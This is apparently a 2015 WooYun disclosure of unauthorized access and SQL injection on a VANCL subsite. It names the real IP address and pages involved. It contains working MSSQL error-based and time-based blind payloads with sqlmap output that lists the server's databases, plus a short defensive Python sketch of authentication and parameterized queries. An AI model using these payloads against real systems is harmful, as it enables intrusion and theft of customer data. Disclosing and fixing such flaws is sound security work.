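Bug ID: WooYun-2015-0129544
Title: Unauthorized access on a VANCL subsite leads to SQL injection (sensitive information disclosure)
Vendor: VANCL (凡客诚品)
Author: 土{2}
Submitted: 2015-07-26 22:44
Disclosed: 2015-07-31 22:46
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: The vendor was notified of the vulnerability but ignored it
Tags:
2015-07-26: Details sent to the vendor; waiting for the vendor to handle them
2015-07-26: The vendor has viewed the vulnerability; details are disclosed to the vendor only
2015-07-31: The vendor has actively ignored the vulnerability; details are disclosed to the public
As the title says.
http://119.253.55.28/ui/
Injection URL: http://119.253.55.28/ui/mail/PhoneQuery/PhoneQuery.aspx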
Place: (custom) POST
Parameter: JSON #2*
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: {"formCodes":[{"orderId":"(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5096=5096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113))))"}]}

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
    Payload: {"formCodes":[{"orderId":"(SELECT (CASE WHEN (9289=9289) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 9289 END))"}]}
---
[21:58:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[21:58:25] [INFO] fetching database names
[21:58:25] [INFO] the SQL query used returns 12 entries
[21:58:25] [INFO] resumed: ACCOUNTING_VJIA
[21:58:25] [INFO] resumed: master
[21:58:25] [INFO] resumed: model
[21:58:25] [INFO] resumed: msdb
[21:58:25] [INFO] resumed: QQUnion
[21:58:25] [INFO] resumed: SCM_VJIA
[21:58:25] [INFO] resumed: tempdb
[21:58:25] [INFO] resumed: WMS_VBJH
[21:58:25] [INFO] resumed: WMS_VGZ
[21:58:25] [INFO] resumed: WMS_VJIA
[21:58:25] [INFO] resumed: WMS_VSH
[21:58:25] [INFO] resumed: WMS_VNB
available databases [12]:
[*] ACCOUNTING_VJIA
[*] master
[*] model
[*] msdb
[*] QQUnion
[*] SCM_VJIA
[*] tempdb
[*] WMS_VBJH
[*] WMS_VGZ
[*] WMS_VJIA
[*] WMS_VNB
[*] WMS_VSH
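I won't dump the databases. There is also a sensitive information disclosure at: http://119.253.55.28/ui/mail/MailSetting.aspx
It is all caused by the unauthorized access.
Permissions; filtering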
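
The fix named above (permissions, filtering), sketched for a request body of the shape seen in the sqlmap output. This is an added example, not part of the original report and not the vendor's code: it uses Python with an in-memory SQLite table as a stand-in for the site's ASP.NET/SQL Server stack, and the table, session token and function name are constructed for illustration.

```python
import json
import sqlite3

# Constructed sample data standing in for the order table (not the site's schema).
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE orders (order_id TEXT PRIMARY KEY, phone TEXT)")
DB.executemany("INSERT INTO orders VALUES (?, ?)",
               [("1001", "555-0100"), ("1002", "555-0101")])

VALID_SESSIONS = {"constructed-session-token"}  # hypothetical session store
MAX_ITEMS = 50                                  # cap on ids per request


def phone_query(session_token, raw_body):
    """Handle a body shaped like {"formCodes":[{"orderId":"..."}]}.

    Returns (http_status, payload).
    """
    # 1. Permissions: refuse unauthenticated callers before reading any input.
    if session_token not in VALID_SESSIONS:
        return 401, {"error": "authentication required"}

    # 2. Filtering: parse strictly; anything not matching the shape is rejected.
    try:
        ids = [item["orderId"] for item in json.loads(raw_body)["formCodes"]]
    except (ValueError, KeyError, TypeError):
        return 400, {"error": "malformed body"}
    if not ids or len(ids) > MAX_ITEMS:
        return 400, {"error": "bad item count"}
    for oid in ids:
        # Order ids are short ASCII digit strings; SQL expressions never pass.
        if not (isinstance(oid, str) and oid.isascii()
                and oid.isdigit() and len(oid) <= 20):
            return 400, {"error": "invalid orderId"}

    # 3. Bound parameters: only "?" markers are formatted into the SQL text,
    #    so the values are always treated as data, never as SQL.
    marks = ",".join("?" * len(ids))
    rows = DB.execute(
        "SELECT order_id, phone FROM orders "
        "WHERE order_id IN (%s) ORDER BY order_id" % marks, ids).fetchall()
    return 200, {"results": [{"orderId": r[0], "phone": r[1]} for r in rows]}
```

The authentication check comes first so that an anonymous request never reaches the parser or the database; the bound parameters keep the query safe even if the digit filter is later loosened.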
Severity: No impact; ignored by vendor
Ignored at: 2015-07-31 22:46
Vulnerability Rank: 15 (WooYun rating)
None yet
What parameters was this run with? Please advise, thanks.